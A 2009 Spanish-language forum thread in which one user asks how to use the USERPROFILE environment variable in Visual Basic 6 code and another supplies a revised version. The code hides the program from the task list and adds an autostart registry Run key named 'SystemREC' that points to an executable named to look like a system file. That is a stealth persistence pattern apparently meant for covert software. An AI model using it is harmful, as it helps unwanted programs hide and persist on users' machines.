Variables de entorno

Iniciado por .;., 10 Abril 2009, 20:30 PM

0 Miembros y 1 Visitante están viendo este tema.

.;.

Hola, bueno pues he leido lo de las variables de entorno y Environ, pero no se como aplicarlo a este code.

Código (vb) [Seleccionar]
Private Sub Form_Load()
Dim r As String
App.TaskVisible = False
CLAVE = "SystemREC"
VALOR = "C:\WINDOWS\systemrec.exe"
Set wsc = CreateObject("wscript.shell")
r = wsc.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SystemREC")
If r <> VALOR Then
     wsc.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & CLAVE, VALOR
End If
End Sub


¿Alguien sabe?

Quiero cambiar Windows por la variable USERPROFILE

seba123neo

Hola, asi ?

Código (vb) [Seleccionar]
Private Sub Form_Load()
    Dim r As String
    App.TaskVisible = False
    CLAVE = "SystemREC"
    VALOR = Environ("USERPROFILE") & "\systemrec.exe"
    Set wsc = CreateObject("wscript.shell")
    r = wsc.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SystemREC")
    If r <> VALOR Then
         wsc.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & CLAVE, VALOR
    End If
End Sub


saludos.
La característica extraordinaria de las leyes de la física es que se aplican en todos lados, sea que tú elijas o no creer en ellas. Lo bueno de las ciencias es que siempre tienen la verdad, quieras creerla o no.

Neil deGrasse Tyson

.;.